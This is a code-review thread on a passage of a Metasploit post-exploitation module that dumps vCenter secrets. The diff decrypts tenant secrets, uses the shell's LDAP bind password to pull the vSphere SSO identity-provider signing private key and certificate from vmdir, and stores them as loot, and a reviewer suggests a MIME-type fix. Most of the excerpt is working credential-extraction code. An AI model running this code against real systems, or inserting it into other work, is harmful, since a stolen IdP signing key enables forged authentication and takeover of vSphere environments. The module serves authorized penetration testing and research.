modules/post/linux/gather/vcenter_secrets_dump.rb

```diff
@@ -0,0 +1,875 @@
+        }))
+      end
+    end
+  end
+
+  def tenant_aes_decrypt(b64)
+    # https://github.com/vmware/lightwave/blob/master/vmidentity/idm/server/src/main/java/com/vmware/identity/idm/server/CryptoAESE.java#L44-L45
+    ciphertext = Base64.strict_decode64(b64)
+    decipher = OpenSSL::Cipher.new('aes-128-ecb')
+    decipher.decrypt
+    decipher.padding = 0
+    decipher.key = vc_tenant_aes_key
+    return (decipher.update(ciphertext) + decipher.final).delete("\000")
+  rescue StandardError
+    fail_with(Msf::Exploit::Failure::Unknown, 'Error performing tenant_aes_decrypt')
+  end
+
+  def update_keystore(public, private)
+    if public.is_a? String
+      cert = validate_x509_cert(public)
+    else
+      cert = public
+    end
+    if private.is_a? String
+      key = validate_pkey(private)
+    else
+      key = private
+    end
+    cert_thumbprint = OpenSSL::Digest::SHA1.new(cert.to_der).to_s
+    keystore[cert_thumbprint] = key
+  rescue StandardError
+    fail_with(Msf::Exploit::Failure::Unknown, 'Error updating module keystore')
+  end
+
+  def get_idp_creds
+    vprint_status('Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...')
+    idp_keys = get_idp_keys(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)
+    if idp_keys.nil?
+      print_error('Error processing IdP trusted certificate private key')
+      return
+    end
+
+    idp_certs = get_idp_certs(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)
+    if idp_certs.nil?
+      print_error('Error processing IdP trusted certificate chain')
+      return
+    end
+
+    vprint_status('Parsing vmwSTSTenantCredential certificates and keys ...')
+
+    # vCenter vmdir stores the STS IdP signing credential under the following DN:
+    #    cn=TenantCredential-1,cn=<sso domain>,cn=Tenants,cn=IdentityManager,cn=Services,<root dn>
+
+    sts_cert = nil
+    sts_key = nil
+    sts_pem = nil
+    idp_keys.each do |stskey|
+      idp_certs.each do |stscert|
+        next unless stscert.check_private_key(stskey)
+
+        sts_cert = stscert.to_pem.to_s
+        sts_key = stskey.to_pem.to_s
+        if validate_sts_cert(sts_cert)
+          vprint_status('Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate')
+        else # Query IDM to compare our extracted cert with the IDM advertised cert
+          print_warning('Could not reconcile vmdir STS IdP cert chain with cert chain advertised by IDM - this credential may not work')
+        end
+        sts_pem = "#{sts_key}#{sts_cert}"
+      end
+    end
+
+    unless sts_pem # We were unable to link a public and private key together
+      print_error('Unable to associate IdP certificate and private key')
+      return
+    end
+
+    p = store_loot('idp', 'PEM', rhost, sts_key, 'SSO_STS_IDP.key', 'vCenter SSO IdP private key')
+    print_good("SSO_STS_IDP key: #{p}")
+
+    p = store_loot('idp', 'PEM', rhost, sts_cert, 'SSO_STS_IDP.pem', 'vCenter SSO IdP certificate')
```

Comment:
The correct content / mime type is `application/x-pem-file`.
```suggestion
    p = store_loot('idp', 'application/x-pem-file', rhost, sts_key, 'SSO_STS_IDP.key', 'vCenter SSO IdP private key')
    print_good("SSO_STS_IDP key: #{p}")

    p = store_loot('idp', 'application/x-pem-file', rhost, sts_cert, 'SSO_STS_IDP.pem', 'vCenter SSO IdP certificate')
```

Reply:
had no idea that was a legit mime type